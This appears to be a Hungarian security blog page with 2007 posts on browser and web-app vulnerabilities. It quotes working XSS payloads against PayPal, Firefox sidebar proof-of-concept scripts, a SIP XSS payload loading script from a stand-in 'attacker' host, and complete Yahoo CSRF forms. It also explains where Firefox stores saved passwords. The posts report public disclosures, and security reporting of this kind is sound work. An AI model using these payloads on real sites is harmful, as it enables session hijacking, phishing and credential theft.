Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Két PayPal XSS

2007.11.04. 21:48 | buherator | 2 komment

Nemessis talált két XSS lyukat a paypal-en:

crmgateway.paypal.com/payflow/cgi-bin/mail_pcancellation.pl?host=remote&processing=Yes&partner_login=
"><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>

https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&campaign_id=604&offer_id=775
&landing_url=javascript:alert('Nemessis-CLICK-THE-LINK-(HERE)-IF-YOU-HAVE-FIREFOX')

A második Firefoxxal működik, az elsőt nem sikerült életre hívnom (bár őszintén szólva nem fektettem bele nagy energiákat)

Címkék: paypal xss

iDefense Q4 feladat

2007.10.31. 20:01 | buherator | Szólj hozzá!

Az i Defense Labs idei utolsó negyedévi versenye az e-mail klienseket célozza meg. 8000$ díjazásban részesül az az első hat versenyző, aki távolról kihasználható, tetszőleges kód futtatására alkalmas hibát a talál az alábbi szoftverek bármelyikében:
  • Microsoft Outlook
  • Mozilla Thunderbird
  • Microsoft Outlook Express
  • Sendmail SMTP daemon
  • Microsoft Exchange Server
A sebezhetőségnek ki kell elégítenie az alábbi feltételeket:
  • Egy üzenet megnyitásakor a kód lefut.
  • A sebezhetőség érinti a fennti programok legfrissebb, összes elérhető patch-el ellátott verzióját. Ez alól kivételt képes a Microsoft Outlook 2003
  • Beta, RC, Tech Preview és hasonló verziók nem játszanak.
  • A sebezhetőségnek "eredetinek" kell lennie, tehát harmadik fél számára eddig nyilvánosdságra hozott hibák nem játszanak.
  • A sebezhetőség kihasználásához nem kell, hogy egyéb szoftver installálva legyen a célponton.
  • Társadalommérnökködni nem ér.

Működő PoC-ért további 1000-4000$ ütheti a beküldő markát. Bővebb/pontosabb információ itt.

Címkék: quarterly vulnerability challenge

A logok titkai

2007.10.30. 14:53 | buherator | 13 komment

Kicsit elszégyelltem magam, miután elolvastam a legutóbbi poszot a Hacker Webzine-en, amiben Ronald azt ecseteli, hogy miként tudná megtörni a Microsoftos kollegák SharePoint szerverét. Az arcpirító a dologban egyrészt az, hogy a módszer végtelenül primitív, nekem mégsem jutott eddig eszembe, a rosszab viszont az, hogy nem is védekeztem ellene soha, bár ezzel ahogy látom nem vagyok egyedül....

A lénygre térve: ma éppen kaptam egy kedves levelet egy olvasótól, amiben egy link volt mellékelve, amire nyugodt szívvel rá is kattintottam. Ki kell ábrándítsam azokat, akikben felébredt a vírusvadász, nem valami trükkös gonosz szkript futott le a gépemen, megkerülve a NoScriptet, meg a Linux autentikációs mechanizmusait, ennél sokkal prózaibb a helyzet. Ha ugyanis történetesen a kedves levélíró valójában egy gonosz gazficó, aki monitorozta az oldalára érkező látógatók refererjeit, akkor egy pillanat alatt megszerezhette a webmailemhez tartozó aktuális session azonosítót!

Tanúlság: kapcsoljuk ki a referer küldését a böngészőnkben! Firefox alatt az about:config oldalra navigáva a network.http.sendRefererHeader értékét kell ehhez 0-ra állítanunk. Esetleg felinstallálhatjuk ezen kiegészítések valamelyikét, hogy jobban testreszabhassuk a böngésző referer küldési szokásait. Nem mellesleg a referer hamisítás alkalmas lehet sql injection vagy xss támadások kivitelezésére is, ha meglátogatott weboldal lognézegetője hibásan van megvalósítva.

Címkék: referer

Távirányítós Windows

2007.10.30. 14:34 | buherator | Szólj hozzá!

"... egyes Microsoft ügyfelek egy reggel azt vehették észre, hogy WSUS-on lógó összes szerverük és desktop-juk elfogadás nélkül, automatikusan Windows Desktop Search (WDS) szolgáltatással felszerelt állapotba került. Bobbie Harder, a Microsoft WSUS csapat programigazgatója a WSUS blogban elismerte, hogy a kéretlen telepítés a Microsoft hibájából történt. Mint írta őszintén sajnálják az okozott a kellemetlenséget és elnézést kérnek az érintettektől." - HUP

Akkor ez azt jelenti, hogy a Microsoft a Windows Update-en keresztül kérdés nélkül azt telepít a gépünkre amit nem szégyell? A szoftverben úgy tűnik, hogy ott van a lehetőség.

Címkék: microsoft windows

A világ öt legjobb fehérkalapos hackere

2007.10.27. 11:27 | buherator | 2 komment

Egy szubjektív, de érdekes rangsor, pédát lehet venni:

1. Stephen G. 'Woz' Wozniak
Az Apple alapítója. Karrierjét blue-boxok építésével kezdte, melyeket aztán osztálytársainak árult. A blue-box egy olyan eszköz, amely egy speciális frekvencia (2600Hz) kiadásával alkalmas volt arra, hogy segítségével az analóg telefonrendszereken keresztül ingyen bonyolítsunk távolsági hívásokat. Nos, Woz egyszer Henry Kissingernek adva ki magát a Pápát hívta fel...

A tehetséges diákot kirúgták az iskolából, ez után már volt ideje Steve Jobsszal kitalálni és megalkotni az Apple I-t, melynek darabját 666,66$-ért adták el egy helyi kereskedőnek.

Wozniak az Applenek hátatfordítva jelenleg jótékonysággal foglalkozik: A Los Gatos Union School Districtben oktat valamint technikai eszközökkel látja el az ott tanuló illetve dolgozó tanárokat és diákokat.

2. Tim Berners-Lee
A World Wide Web kiagyalója. Berners-Leet először az Oxfordi Egyetemen kapták hackelésen, ezután eltiltották az iskola számítógépeitől. A WWW létrejötte után megalapította a World Wide Web Konzorciumot, amely a mai napig az ingyenes és szabad webes szabványok első számú karbantartója.

3. Linus Torvalds
Linux rendszerek atyja. Sikres operációs rendszerét mérnöki kedvtelésből kezdte el írni, hogy "jót szórakozzon miközben megírja a legjobb rohadt operációs rendszert amit csak tud". Egyik első számítógépének, egy Sinclar QL-nek már módosította az operációs rendszerét, és írt hozzá többek között egy assemblert egy szövegszerkesztőt és néhány játékot is. A Linux kernelt 1991-ben alkotta meg, először csak egy taszkváltóval és egy terminal driverrel, majd másokat is megkért, hogy adjanak kódot a rendzsermaghoz.

Torvalds kódja jelenleg a Linux kernel 2%-át teszi ki, a hacker leginkább a fejlesztések koordinálásáról gondoskodik.

4. Richard M. 'RMS' Stallman
A GNU Project alapítója, melynek célja egy teljesen szabad operációs rendszer létrehozása. Emiatt a szabad szoftver atyjának tartják. Filozófiája szerint " A zárt szoftver megosztja a felhasználókat, és tehetetlenné teszi őket azáltal, hogy nem nyújt lehetőséget a módosítására és a megosztására. Egy szabad operációs rendszer elengedhetetlen eszköz ahhoz, hogy az emberek szabadon használhassák a számítástechnikát."

Stallman az MIT-n dolgozott többek között az Emacs fejlesztésén. Nem nézte jó szemmel a korlátozott számítógéphasználatot a laboratóriumban, ezért az összes jelszót kinullázta majd értesítette a felhasználókat a "változásról".

Stallman nevéhez fűződik többek között a GNU C Compiler (melyet a legendák szerint a világtól teljesen elvonulva, egyhuzamban írt meg) és a GNU Debugger is. Jelenleg a szabad szoftver egyik legnagyobb élharcosa, munkája elismeréseként négyszer avatták tiszteletbeli doktorrá.

5. Tsutomu Shimomura
Kevin Mitnick tevékenységének egyik áldozata, majd végzete. Az őt ért támadás után jelentős szerepet játszott Mitnick elfogásában. Csapatával bemérték vetélytársa mobiltelefonját, majd egy speciális antenna segítségével meghatározták a préda pontos helyét, innentől pedig az FBI-nak már nem volt nehéz dolga.

Én személy szerint hiányolom Eric S. Raymond-ot, az én listámon majd ő is szerepelni fog...

Címkék: whitehat

Vadászat a Tüzes Rókára

2007.10.26. 14:16 | buherator | 1 komment

Ronald ma reggel vadászni indult. Firefox hibákra vadászni. Nem régen leste ki a gazfickók egyik rejtekhelyét: az oldalsávot, a helyet, amiről a legtöbb ember azt sem tudja, hogy létezik! A vadász szimata jó volt, nem tért haza üres kézzel:

Az első hiba/feature segítségével arra vehetjük rá a gyanútlan felhasználókat, hogy olyan könyvjelzőket hozzanak létre, melyek neve nem tükrözi az URL-t amit takarnak:

<script>
window.sidebar.addPersistentPanel('BuheraBlog',
'http://www.evilness.com/h4x0r.do','\0');
</script>


Még szerencse, hogy hősünk hobbija a bugvadászat, és nem az adathalászat...

A második hiba egy jól megtermett perzisztens DoS, lényegében az előző továbbfejlesztése. A következő kódrészlet által beállított könyvjelzőre kattintva, a böngésző nem hajlandó többé megjeleníteni bármilyen URL-t. Akkor sem ha újraindítjuk! El kell valahogy tüntetni az oldalsáv paneljét, vagy újrainstallálni a böngészőt. Az alábbi kód nem biztos hogy megfelelő számú A-t tartalmaz, de Ronald új találmánya, a BrowserFry elég hamar megolja ezt a problémát (is).

<script>
window.sidebar.addPersistentPanel('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRGGHH!
...és még több AA!:)',
'http://www.evilness.com/h4x0r.do','\0');
</script>

Update: Ez utóbbi hiba kihasználását megleshetitek itt(.avi), ha nem akarjátok a saját böngészőtöket kockáztatni.

Címkék: firefox bug phishing dos

Jelszótörés videókártyával

2007.10.26. 12:42 | buherator | Szólj hozzá!

"Egy kétes hírnevű orosz cég [Elcomsoft - MS Gold Certified Partner...] a videokártya processzorát vonja be a jelszavak feltörésének erőforrásigényes procedúrájába. Egy 60-70 ezer forintos grafikus kártya a huszonötszörösére gyorsítja a törést." - Index

Egy kis kiegészítés: az eszköz eleve úgy van kitalálva, hogy elosztott rendszeren működjön egy húsz gépes park felállításához a licensz kb. 150 ezer forintba kerül + a vas, szóval valaki lehetne olyan jó, és írhatna a John the Ripperhez egy patchet, nem tűnik olyan bonyolultnak  a dolog :)

Kis kiegészítés a vállalkozó kedvűeknek: A program az NVIDIA CUDA C fordítót és fejlesztői eszközt használja, amely nyílt interfészen biztosít hozzáférést a GeForce 8-as kártyák GPU-jához. Hasonló alkalmazást fejleszteni tehát relative könnyű, annyi a probléma, hogy csak a CUDA támogatott kártyákkal (GeForce 8) fog működni a progi, de ha a cég által közzétett eredmények nagyjából fedik a valóságot, akkor már simán megéri beruházni pár új videókártyára (az enyém már amúgy sem támogatott :D).

Update2: az azért nem teljesen korrekt, hogy az Elcomsoft kétes hírű lenne, a cég '90 óta létezik, és Microsoft Gold CertifiedPartner...

Címkék: gpu jelszótörés

Adobe PDF proof-of-concept

2007.10.25. 14:29 | buherator | Szólj hozzá!

Anno elmulasztottam megemlíteni a Petko Petkov Adobe PDF hibát, amely parancsfuttatást tesz lehetővé PDF fájlokon keresztül. Ha jól emlékszem ennek egyik oka az volt, hogy nem volt elérhető PoC vagy egyéb leírás a hibával kapcsolatban, ezért úgy gondoltam, hogy a megfelelő hírportálok majd úgyis tájékoztatnak mindenkit. Ma azonban az Antivírus blogon értesültem róla, hogy mivel az Adobe kiadta a megfelelő frissítést, és az élelmes vírusírók/hackerek kihámozták, hogy mi volt a probléma, most már létezik PoC, meg persze féreg is, ami a hibát kártékonyan kihasználja. Íme egy megbuherált PDF érdekes része:

Látható, hogy itt is a már sokat emlegetett URI kezelőkön keresztül hajdódik végre a megfelelő parancs, valaki elmagyarázhatná, hogy ezekhez miért fér így hozzá mindenki...

A hiba csak Windowson használható ki, érintettek az Adobe Reader, Acrobat, és 3D termékei, ezeket érdemes minél előbb frissíteni, vagy Rambo ajánlásának megfelelően alternetív PDF olvasót/operációs rendszert használni.

Címkék: adobe pdf

A Leopard biztonsági fejlesztései

2007.10.24. 12:46 | buherator | 1 komment

"Pénteken érkezik a kereskedelmi hálózatba a Mac OS X legújabb, 10.5-ös verziószámú, "Leopard" kódnévre hallgató kiadása. Az Apple néhány napja fellebbentette a fátylat az OS X legújabb nagy verziójának újdonságairól, amelyek közt 11 új biztonsági szolgáltatást is kap majd az ügyfél." - HUP

Nem is olyan régen volt alkalmam Windows Vista-n dolgozni, és ez a három dolog maradt meg bennem az operációs rendszerrel kapcsolatban:
  • A kezelhetőséget megpróbálták az OS X szintjére emelni
  • A biztonság terén a Linux útját követték
  • Ennek eredményeként eléggé meg lehet izzadni, mire az ember ráveszi a gépet, hogy az a kívánt működést produkálja
Ezek után rendkívül kíváncsi voltam, hogy az Apple is beleesik-e a Microsoft hibáiba, szóval gyorsan elolvastam amit lehetett a dologgal kapcsolatban, és bár az új  rendszert még nem próbálhattam ki, a következőket emelném ki:
  • A letöltött alkalmazások megcimkézése: Ez nyilván ugyanúgy a felhasználók agyára fog menni, mint a Windows esetében, azonban fontos különbség, hogy a Leopard amellett, hogy figyelmeztet a letöltött alkalmazások veszélyeire, arra is felhívja a figyelmet, hogy melyik alkalmazás, mikor és honnan töltötte le a programot. Ez azért is fontos, mert ha Gizike minden letöltött alkalmazás esetében ugyanazzal a figyelmeztető ablakkal találkozik, egy idő után reflexből kattint a "Folytatás"-ra, míg egy kódolt URL vagy egy IP cím már nagyobb eséllyel kelti fel a gyanút az egyszerűbb felhasználóban is.
  • Hitelesített alkalmazások: Ezt már az XP is tudta, de nekem egyszer sem működött. Ha az Apple-nek sikerül jól használható lehetőséget biztosítani a külső fejelsztők számára alkalmazásaik hitelesítésére, ez a funkció rengeteg terhet vehet le a felhasználók válláról.
  • Sandboxing: Helyes, jó ötlet, gratula! Nem muszáj minden alkalmazásnak minden erőforráshoz hozzáférnie, maradjon a homokozóban, akinek elég a szita meg a kisvödör! Aztán meglátjuk, lesz-e olyan okos kópé, aki a homokvárból veszi be a játszóteret...
  • Library Randomization: Szintén jó ötlet, ez a technika már sok helyen bizonyított, a Vista is ezzel erősít szerencsére.
Összességében úgy látom, hogy a fejlesztők jobban megtalálták az egyensúlyt a biztonság és a használhatóság között, a többi új feature (melyek hiánya a Vista esetében szintén fájó pont volt) pedig valószínűleg kellő kárpótlást nyújt majd az okozott kellemetlenségekért. Minden esetre izgalommal várom az első Leopardos exploitokat, ígérem Ti sem maradtok le róluk!

Címkék: vista leopard os x

Mikor a tudomány és az irodalom találkozik

2007.10.23. 19:57 | buherator | 2 komment

Nos, azt nevezzük science-fictionnek, de nem kell megijedni, nem irodalmi értekezés következik. Csupán Sandro Gauci cyberpunk szösszenetét szeretném a figyelmetekbe ajánlani, melyen keresztül a szerző a saját maga által készített SIPVicious programgyűjtemény használatát szemlélteti. Érdekes próbálkozás, én jót szórakoztam rajta, nem lenne rossz, ha több szoftverhez is ilyen formában készítenének manualt :)

Az olvasmányt innen szedhetitek le, angolul van, szűk 4 oldal, sok képernyőképpel.

Címkék: kultúra cyberpunk phreaking

Megtörték Mitnicket (megint)

2007.10.20. 17:42 | buherator | 2 komment

Tegnap hajnalban deface-elték a hackerlegenda, Kevin Mitnick hivatalos weboldalát. A támadók a szokásos fikázás mellé azért voltak kedvesek feltenni az eredeti tartalmat gzippelve, hogy az illetékeseknek könnyebb legyen visszaállítani az oldalt.

Hölgyeim és uraim, ez a blog 100. bejegyzése! Köszönöm a töretlen érdeklődést, remélem sikerül tartani a színvonalat :)

Címkék: incidens mitnick deface

URL hamisítás

2007.10.20. 16:53 | buherator | Szólj hozzá!

Michal Sobieraj szemléletes cikkében azt elemzi, hogy hogyan kezelik a különböző böngészők a speciális Unicode karaktereket tartalmazó URL-eket. Szabadfordítás következik:

Azokat az URL-eket, amelyek nem-ASCII karaktereket is tartalmaznak, mindig ASCII kompatibilis formában (valahogy így xn--t-zfa.com) kellene a felhasználók számára megjeleníteni, hogy a vizuális megtévesztések elkerülhetők legyenek.

Úgy tűnik azonban, hogy néhány Unicode mellékjel meg tudja kerülni ezt a szabályt bizonyos elterjedt böngésző esetében.

Címkék: firefox opera safari internet explorer phishing url spoofing

Real Player 0day

2007.10.20. 12:04 | buherator | Szólj hozzá!

Egyes híresztelések szerint a NASA arra kéri alkalmazottait és partnereit, hogy ne használjanak Internet Explorert, mivel a böngésző ActiveX vezérlőjén keresztül egy új Real Player sebezhetőséget (azt elárulná valaki, hogy a sebezhető rendszerek felsorolásához hogy kerül a SuSE Linux?) használnak ki rosszindulatú támadók.

Bár a hiba kihasználására nem ismerünk publikus exploitot, a Symanteces szakértők azt gyanítják, hogy egy korábbi DoS-t okozó támadás továbbfejlesztéséről van szó. A támadás egy speciális weboldal segítségével történik, amely ellenőrzi a telepített RealPlayer verziókat, és ha sebezhető változatot talál, trójai programot telepít a látogató gépére. A sikeres támadást a RealPlayer példavideójának lejátszása jelzi.

A támadás ellen legegyszerűbben a következő registry kulcs beállításával védekezhetünk:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

de természetesen az ActiveX vezérlők és a JavaScvript letiltása is segít.

Címkék: internet explorer 0day real player

Kommandósokat a szomszédba

2007.10.19. 11:11 | buherator | Szólj hozzá!

Egy 19 éves kaliforniai srácot azzal vádolnak, hogy a hívószámát meghamisítva a 911-es segélyhívószámot használva kommandósokat küldött egy idegen család házába. A fiú a 911-et hívva azt állította, hogy lelőtt egy embert, és hogy további gyilkosságokra készül. A hamisított telefonszámhoz tartozó házhoz kiérkezve a  rendőrség speciális különítménye a konyhakéssel felfegyverkezett áldozattal találta magát szemben, aki a bokrok zörgésére azt hitte, hogy betörő settenkedik  a kertjében, de meglepetésére a kommandós alakulat puskacsöveivel kellett szembenéznie.

Nem ez az első ilyen eset, a hasonló átverésekre az amerikai szlengben a "swatting" kifejezést használják (utalva a SWAT betűszóra, amely az amerikai rendőrség különleges egységét jelöli). 2005-ben például egy trójai program segítségével tárcsáztattáka 911-et a z amerikai családok WebTV készülékein keresztül...

Címkék: móka trojan phreaking swatting

Rendőrség, a privát kulcsát kérem!

2007.10.18. 22:20 | buherator | 1 komment

Na, kissé sok volt a dolgom az elmúlt pár napban, mostanra sikerült magam átrágnom a Crypto-Gramon, amiben Schneier úr megint megmondja a tutit :)

Szóval a globális terrorpara legújabb eredménye az a brit törvény, amely öt évig terjedő szabadságvesztéssel bünteti, ha valaki nem hajlandó kiadni a titkosításhoz használt kulcsait a rendőrségnek.

Ez nagyon remek, végre a gonosz pedofilok meg terroristák nem rejthetik mocskos kis titkaikat mindenféle matematikai problémák mögé! Vagy mégsem?

Címkék: jog privacy uk

XSS telefonon

2007.10.12. 19:10 | buherator | Szólj hozzá!

Ha kocka lennék most azt mondanám, lol. Mondjuk kocka vagyok, de csak azért sem mondom :) Szóval hogy a fenébe lehet cross-site scriptinget csinálni egy telefonnal? A válasz egyszerű, ha el sikerül vonatkoztatnunk a manapság leggyakrabban használt vezetékes és mobil készülékektől: VoIP telefont fogunk hackelni, méghozzá hardot!

A célpont egy Linksys SPA-941 típusú VoIP telefon lesz, amely egy beépített webkiszolgálóval rendelkezik, melyen keresztül elvégezhető egy csomó hasznos telefonnal kapcsolatos tennivaló. Ezek egyike a nem fogadott hívások listázása, melynek során azt találjuk, hogy a From mező értéke nincs megfelelően szűrve. Nosza, küldjünk egy speciális SIP csomagot a telefonnak a következő feladóval:

 "<script x='" <sip:'src='http://attacker/xss.js'>@192.168.1.9:5060>;tag=1",

A következő alkalommal, amikor valaki utánanéz a nem fogadott hívásoknak , szépen lefut a távoli szkript, és hopp, kompromitáltuk is a gépet! A legjobb az egészben, hogy ha egy belső hálón lévő telefont "hívunk fel", simán átmászhatunk a céges tűzfalon is (ha Jeremiah Grossmann vonatkozó írását megtalálja valaki, pls küldje be kommentbe)!

A módszert Radu State küldte be a Full-Disclosure-re, további infot ott találtok.


Címkék: voip xss sip

Szökés az iPhone börtönéből

2007.10.11. 19:17 | buherator | Szólj hozzá!

Mint arról már a HUP is hírt adott, sikeresen kijátszották az iPhone új firmware-rel érkező védelmét, amely megakadályozza a harmadik féltől származó adatok feltöltését a telefonra. A "jailbreaket" ugyanazzal a TIFF képek kezelésénel jelentkező buffer overflow hiba kihasználásával érték el, amelyet több mint egy éve a PSP-k hackeléséhez használtak.

A dolog azért nem volt ennyire egyszerű, a PSP-k ugyanis MIPS, az iPhone-ok viszont ARM architektúrájú processort használnak, ráadásul az okostelefon vermében lévő kódot nem lehet futtatni. Az exploit ezért kicsit módosításra került, bele kerültek az architektúrát érintő változások, valamint a jailbreak kódot nem a stackből, hanem a heapből futtatja.

A vállalkozó kedvűek az iPhone teljes filerendszeréhez hozzáférhetnek néhány egyszerű lépés megtételével.

A heise Security cikke itt.

Címkék: safari iphone

A Yahoon a sor

2007.10.11. 09:36 | buherator | Szólj hozzá!

A vihar csendesedni látszik a Google körül, de a szél a felhőket a Yahoo felé sodorja: Nitesh Dhanjani két CSRF támadást mutatott be a Yahoo ellen. A kihasznált hibák nem a fő webes alkalmazásokat, hanem a mobil eszközökre szánt WAP és mobil web szolgáltatásokat érintik (mint anno a Freemailnél - ha emlékszik rá egyáltalán valaki ;), de a támadások weben kereszül is kivitelezhetők.

Az első, kevésbé súlyos hiba a Yahoo Instant Messengert érinti. Az alábbi kódot tartalmazó weboldalt meglátogató felhasználót kilépteti a rendszer:

<img src="http://us.m.yahoo.com/p/messenger?tsrc=rawfront" height="0" width="0"/>

A második, jóval súlyosabb hiba a Naptár szolgáltatást érinti, az alábbi kód segítségével tetszőleges bejegyzést adhatunk vagy törölhetünk az aktív Yahoo sessionnel rendelkező naptárjához/ból:

<form name="csrfevent" action="http://wap.oa.yahoo.com/raw?dp=cale&ae=y&v=6&i=0&t=1111111111" method="post" target="hidden">
    <input type="hidden" name="ySiD" value="" />
    <input type="hidden" name="tt" value="XSRF Demonstration event" />
    <input type="hidden" name="mdy" value="10%2F10%2F2007" />
    <input type="hidden" name="hm" value="01%3A00" />
    <input type="hidden" name="ap" value="pm" />
    <input type="hidden" name="dh" value="12" />
    <input type="hidden" name="dm" value="45" />
    <input type="hidden" name="sh" value="0" />
    <input type="hidden" name="dd" value="Yahoo XSRF demonstration event" />
    <input type="hidden" name="Save" value="Save" />                 
</form>
   
<form name="csrftask" action="http://wap.oa.yahoo.com/raw?dp=cale&v=34&v=6&i=0&t=1111111111" method="post" target="hidden">
    <input type="hidden" name="ySiD" value="" />
    <input type="hidden" name="todo" value="y" />
    <input type="hidden" name="srt" value="y" />
    <input type="hidden" name="tt" value="XSRF demonstration task" />
    <input type="hidden" name="mdy" value="10%2F10%2F2007" />
    <input type="hidden" name="pri" value="1" />
    <input type="hidden" name="sh" value="0" />
    <input type="hidden" name="dd" value="Yahoo XSRF demonstration task" />
    <input type="hidden" name="Save" value="Save" />
    <input type="hidden" name="golink" value="v%3D" />
</form>

<script>document.csrfevent.submit();</script>
<script>document.csrftask.submit();</script>


A hiba remek lehetőséget nyújt az adathalászoknak, spammereknek, illetve más típusú csalóknak. Dhanjani értesítette a Yahoot a dologról, reméljük mielőbb megszületik a javítás!

Címkék: yahoo csrf

XML-be injektált szkript (Firefox alá?)

2007.10.09. 17:14 | buherator | Szólj hozzá!

Már tényleg kezd vicces lenni, hogy a Firefox kb. mindenbe enged szkriptet írni. Gareth Heyes újabban például XML-be injektál. Legközelebb azzal jön elő valaki, hogy a HTML entity-kből (tudjátok, á) lehet alerteket dobálni... Tényleg, próbálta már valaki?

Frissítve: Most látom, hogy Opera alatt olvastam a bejegyzést...és ott is működik :)

(U.i: nem tudom hogy az 50 update milyen hatással van az RSS nézőkre, ha sok szemetet gyárottam, akkor sorry)

Címkék: firefox opera xml xss

Privacy lyuk a Firefoxban

2007.10.07. 14:11 | buherator | Szólj hozzá!

Miközben az előző poszthoz gyűjtöttem az infókat egy kis érdekességbe botlottam:

Előszeretettel használom a Firefoxnak azt a funkcióját, ami törli a személyes adataimat a program bezárásakor. Pá-pá terhelő bizonyítékok tracker cookiek! Miközben azonban a mentett jelszavaimat tartalmazó fájlt nézegettem (igen, vannak mentett jelszavaim, természetesem egyikkel sem érek el érzékeny adatokat) arra lettem figyelmes, hogy a fájl eleje tele van olyan odlalak URL-jeivel, amelyeknél ugyan regisztrálva vagyok, de a belépési információimat nem mentettem el. Namármost, ha valaki regisztrál mondjuk a wetriffs.com-ra, és nem szeretné, hogy a családja/kollegái/hatóság/spammerek erről tudomást szerezzenek, akkor törli a history-t, a cookie-kat, nem menti el a jelszavát, és úgy érzi, soha nem derül fény mocskos kis titkára. Pedig de.

Címkék: firefox privacy

Kívánságműsor: Hol tárolja a Firefox a jelszavakat

2007.10.07. 12:26 | buherator | 6 komment

A nagy sikerre való tekintettel folytatódik a kívánságműsor. A pártatlanság jegyében az Internet Explorer után most a Firefox jelszótárolási szokásait elemezzük ki - bár az iPhone magyarországi megjelenéséről és a Yahoo Messenger magyarításáról többen érdeklődtek, ezek kevésbé illeszkednek a blog témájához.

Nos, a platformfüggetlenség és nyíltság jegyében a Firefox nem hagyatkozhat olyan egyedi szolgáltatásokra mint a rendszerleíró adatbázis, ezért a perzisztens adatok tárolására egyszerű szöveges állományokat használ. Az elmentett jelszavakat tartalmazó állomány Windows rendszereken a


%userprofile%\Application Data\Mozilla\Firefox Profiles\xxxxxxxx.default\signons.txt

Linuxokon a

~/.mozilla/firefox/xxxxxxxx.default/signons.txt

útvonalon érhető el, ahol az xxxxxxxx a profil egyedi, véletlengenerált azonosítója. A signons.txt (2.0-ás változatoknál signos2.txt azt hiszem) kódolatlanul tartalmazza azokat az URL-eket, amelyekhez elmentettük a jelszavainkat, valamint az ezeken a címeken található űrlapok automatikusan kitöltendő mezőinek nevét. Maguk a beírandó adatok titkosítva,  és base64-gyel kódolva vannak eltárolva.  A titkosítási algoritmus  állítólag 3DES, de erre nem vennék mérget, a Mozilla mag támogatja az RC4, DES és AES eljárásokat is.  A titkosításhoz salt-ot is használnak, ennek értéke azonban nem oldalspecifikus, így  a mentett jelszavak  átmásolhatók más oldalakhoz is. Arról nem találtam információt, hogy a salt telepítésenként egyedi-e, vagy függ-e a profiltól. Amennyiben nem, úgy egy elcsent signos.txt az eredeti tulajdonostól függetlenül simán visszafejthető a Firefox segítségével (Edit->Prefs->Security->Show Passwords...->Show Passwords).

Erre a kellemetlen helyzetre nyújt orvosságot a Mesterjelszó beállítása, melynek segítségével még egy titkosítási réteget húzhatunk érzékeny adatainkra

Na igen, ennél a pontnál nyelte el a blog.hu a posztom másik felét...

Szóval a lényeg a következő: A Mesterjelszó a keyN.db salt fájllal karöltve adja ki a titkosításhoz használt kulcsot, innentől kezdve az adatokat két biztonsági réteg: egy tudás és egy birtoklás alapú védelmezi, ami már megnyugtató a legtöbb esetben. Ellenben ha elfelejtitek a Mesterjelszót az szívás, marad a brute-force.

Címkék: firefox kívánságműsor

Hétvégi matekóra: Gyorsabb Blind SQL Injection

2007.10.06. 12:37 | buherator | 2 komment

